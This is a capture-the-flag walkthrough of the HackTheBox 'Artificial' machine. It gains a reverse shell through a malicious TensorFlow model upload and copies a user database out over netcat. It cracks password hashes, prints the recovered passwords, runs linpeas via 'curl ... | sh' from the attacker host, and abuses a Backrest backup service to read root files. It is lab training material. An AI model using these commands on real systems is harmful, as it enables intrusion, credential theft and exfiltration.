HackTheBox | Artificial [Easy] Writeup

Machine Information

Guide:

Initial Setup:

Edit the hosts file and add this target instance as a entry

1vim /etc/hosts
Copy

Add the following entry

110.10.11.74   artificial.
Copy

Nmap Scan

Run an Nmap scan of your preference, or use the following (quick scan):

1sudo nmap -sS -sV 10.10.11.74 -stats-every=5s
Copy

These should be your results (if not similar):

We notice that an nginx server is running on port 80, indicative of an http web server. There also exists an openssh server running on port 22.

Visiting artificial.htb in a browser of your choice, we reach the following landing page:

It seems that this website offers us the ability to deploy AI models. Let's inspect the site and use devtools to see anything of importance.

I noticed that there was an error, with its source being from one of the site's scripts.

It seems that, based on the script, there is a webpage that contains an upload form—'model-upload-form'—that we might be able to upload a payload to establish a reverse shell in the future.

In addition to the webpages we already saw in the navigation bar (reviews, login, register), we can use ffuf to enumerate web directories and anything that might guide us to reaching our user own sooner.

1ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://artificial.htb/FUZZ -ic
Copy

Results:

I could try and brute force the login page for default credentials, but I don't believe that would be the best course of action. I'll see if we could make an account and operate from there

The site accepts these credentials. After logging in, we are shown the following upload form:

Let's take a look at the requirements and the dockerfile.

Requirements.txt

Dockerfile

Researching this environment (Tensorflow cpu ver 2.13.1), we eventually reach the following:

https://github.com/Splinter0/tensorflow-rce

https://splint.gitbook.io/cyberblog/security-research/tensorflow-remote-code-execution-with-malicious-model

Crafting Our Exploit

Let's go ahead and run a docker container, using the dockerfile we were given.

Install docker, build from docker file, and run the image

1sudo apt install docker.io
2sudo docker build --tag 'artificial' . 
3sudo docker run -i -t artificial
Copy

This will bring us to a terminal in our docker container. Your last command should bring something similar to the following:

Your image's ID will be the set of characters following the '@' sign. Take note of this as we will be copying files to and from this container.

In a separate terminal tab (outside of our docker container), we will be creating the exploit file.

For this exploit to work, be sure to replace the IP address with yours.

Save the file, then copy it to the docker container

1sudo docker cp exploit.py container_id:/exploit.py
Copy

Now, let's set up our listening port for the reverse shell. In another terminal tab,

1nc -lvnp 666
Copy

Compile the exploit in the docker container

It seems that netcat isn't installed in our docker container. We can restart our container and install netcat, so that our shell can be properly established.

Restart the container with

1sudo docker restart container_id
Copy

Connect to the docker container with

1sudo docker exec -it container_id
Copy

Listening on port 6666 and recompiling the exploit inside of the docker container, and we should receive the following:

We have a shell! Now all we have to do is upload the h5 file (this is the output file from compiling our exploit) to the upload form we saw earlier.

Copy the h5 file from the container to our local machine

1sudo docker cp container_id:/exploit.h5 . 
Copy

Make sure to start listening through netcat once again in another terminal tab

1nc -lvnp 6666
Copy

Upload the h5 file to the form

Click "View Predictions", and a reverse shell should be established.

Checking the first directory that we're in, we find the following files.

I find app.py the most interesting because it might give us greater insight to how the model runs on the target machine.

1cat app.py
Copy

In app.py, there is this code segment:

It seems that passwords in this app are encrypted using the hashlib module. Passwords are encoded in UTF-8, hashed in MD5, then translated into hexadecimal characters.

Let's continue to look around for any important files.

There is a user database file under the instance directory. Let's go ahead and transfer this file to our machine and investigate it for any important information.

On our attack machine:

1nc -lp 1234 > users.db
Copy

On our reverse shell:

1nc -w YOUR_IP_ADDRESS 1234 < users.db
Copy

Now that we have the database file in our own machine, we can view it using sqlitebrowser.

1sqlitebrowser
Copy

We will be shown the following GUI:

There are two tables: model and user. We're most interested in the user table.

We have user credentials that we can most likely use to ssh into the target machine. But before we crack the password(s), it would be better for us to identify which user has an active account on the target machine.

In our reverse shell,

1cd /home
2ls
Copy

We see that there are two user accounts: app and gael. This indicates that we should crack gael's password.

Copy his password hash to a file to be cracked

1echo 'PASSWORD_HASH' > pw_hash
2hashcat -m 0 pw_hash /usr/share/wordlists/rockyou.txt.gz 
Copy

We crack gael's password.

Gaining User Pwn

We now ssh into the target machine using gael's credentials

1ssh gael@artificial.htb 
Copy

Use the following password: mattp005numbertwo

Success!

To view the flag,

1cat user.txt
Copy

Gaining Root Pwn

One useful tool for Linux-based machines is linpeas. We will host this file on an http server from our attack machine, to be transferred over to the target machine.

In our attack machine, open the linpeas directory

1linpeas
Copy

Host an http server from this directory

1sudo python3 -m http.server 80
Copy

From our target machine (gael's ssh instance)

1curl YOUR_IP_ADDRESS/linpeas.sh | sh
Copy

The terminal output will display information that we can use to progress towards root pwn. One thing that does stand out to us is a backup file that only root and sysadm (system admin) should have reading access to.

Quick search on what backrest is provides this repo.

I'm going to copy the backup file to gael's home directory so that I can investigate it.

1mkdir .backrest
2cp /var/backups/backrest_backup.tar.gz .backrest/
3cd .backrest/
Copy

Extract the backup file to the current directory

1tar -xf backrest_backup.tar.gz
Copy

Cd into the new directory, and listing the contents shows us the following

There are multiple executable files, as well as a configuration directory. Before we run anything, take a look into the config folder for any important information.

1cd .config
Copy

We find a root user account for the Backrest backup service. It's encrypted in Bcrypt, but shows a different set of characters than the example hashes by Hashcat.

We can use cyberchef.io to help us translate the hash into a more identifiable format.

Save the full hash to a file, to be cracked using hashcat.

1echo '<FULL_SALT_AND_PASS_HASH>' > br_hash
2hashcat br_hash /usr/share/wordlists/rockyou.txt.gz
Copy

Hashcat identifies the hash in the following format(s).

Finally, let's attempt to crack the password with hashcat

1hashcat -m 3200 -w 3 br_hash /usr/share/wordlists/rockyou.txt.gz
Copy

Cracked! Our hashcat command output shows the following

Credentials are the following:

Username: backrest_root
Password: !@#$%^

We have these credentials, but where do we find the service that uses these?

Taking a look back into the backrest backup directory

The backup directory also hosts logs. Taking a look at the logs in order, process logs first

We can see that an HTTP server for Backrest is hosted on port 9898. Let's see if it is open to outside traffic.

1netstat -tulpn
Copy

Netstat shows that the machine only hosts the backrest port locally, which means that we will have to tunnel this port to our attack machine in order to view it in our browser. Here's more information about ssh tunneling.

In another terminal tab,

1ssh -L 9898:<TARGET_MACHINE_IP>:9898 gael@artificial.htb
Copy

Now, visiting localhost:9898 in our attack machine's browser.

We have a login page!

Using the backrest_root credentials from earlier, we get to the admin dashboard.

After looking through the documentation, we see that we can make a backup (repository) of our desired file(s). In addition, we have the option of viewing the contents of those file(s) in this dashboard. Considering this, we might be able to make a backup of the root directory, then view important files from there.

First, we'll make a repository.

After creating the repository, we'll view it and run commands.

Click on Run Command, then use the help command.

We'll be making a backup of the root directory, listing the files in the snapshot, then dumping the content of our chosen file.

Make a backup of root:

1backup /root
Copy

List files in the snapshot of root:

1ls <SNAPSHOT_ID> /root
Copy

Dump the content of the root.txt file

1dump <SNAPSHOT_ID> /root/root.txt
Copy